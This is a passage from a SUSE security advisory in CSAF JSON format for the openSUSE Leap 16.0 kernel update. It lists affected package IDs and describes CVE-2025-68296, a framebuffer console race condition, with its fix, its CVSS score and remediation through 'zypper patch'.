"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68261"
},
{
"cve": "CVE-2025-68296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup\n\nProtect vga_switcheroo_client_fb_set() with console lock. Avoids OOB\naccess in fbcon_remap_all(). Without holding the console lock the call\nraces with switching outputs.\n\nVGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon\nfunction uses struct fb_info.node, which is set by register_framebuffer().\nAs the fb-helper code currently sets up VGA switcheroo before registering\nthe framebuffer, the value of node is -1 and therefore not a legal value.\nFor example, fbcon uses the value within set_con2fb_map() [1] as an index\ninto an array.\n\nMoving vga_switcheroo_client_fb_set() after register_framebuffer() can\nresult in VGA switching that does not switch fbcon correctly.\n\nTherefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(),\nwhich already holds the console lock. Fbdev calls fbcon_fb_registered()\nfrom within register_framebuffer(). Serializes the helper with VGA\nswitcheroo\u0027s call to fbcon_remap_all().\n\nAlthough vga_switcheroo_client_fb_set() takes an instance of struct fb_info\nas parameter, it really only needs the contained fbcon state. Moving the\ncall to fbcon initialization is therefore cleaner than before. Only amdgpu,\ni915, nouveau and radeon support vga_switcheroo. For all other drivers,\nthis change does nothing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68296",
"url": "https://www.suse.com/security/cve/CVE-2025-68296"
},
{
"category": "external",
"summary": "SUSE Bug 1255128 for CVE-2025-68296",
"url": "https://bugzilla.suse.com/1255128"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
